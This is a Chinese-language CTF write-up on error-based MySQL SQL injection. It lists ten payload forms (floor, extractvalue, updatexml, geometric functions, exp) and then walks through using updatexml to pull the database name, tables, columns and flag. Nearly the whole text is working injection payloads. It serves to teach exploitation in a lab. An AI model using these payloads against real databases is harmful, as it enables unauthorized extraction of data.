CTFHUB-SQL注入-报错注入

报错注入

注入过程中经常根据错误回显进行判断，但是现在非常多的Web程序没有正常的错误回显，这样就需要利用报错注入的方式来进行SQL注入了
十种MySql报错注入
1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));

平时我们最常用到的三种报错注入方式分别是：floor()、updatexml()、extractvalue()。

考点
sql报错注入
分析过程
查询当前使用的数据库

-1 union select updatexml(1, concat(0x7e, database(),0x7e),1)

查询数据库表名

-1 union select updatexml(1, concat(0x7e,( select( group_concat( table_name))from information_schema.tables where table_schema=“sqli”),0x7e),1)

获取表的字段名

-1 union select updatexml(1, concat(0x7e,( select( group_concat(column_name))from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’),0x7e),1)

获取指定数据库的表的列的内容

select*from news where id=-1 union select updatexml(1, concat(0x7e,(select( group_concat(flag)) from sqli.flag), 0x7e),1)

得到flag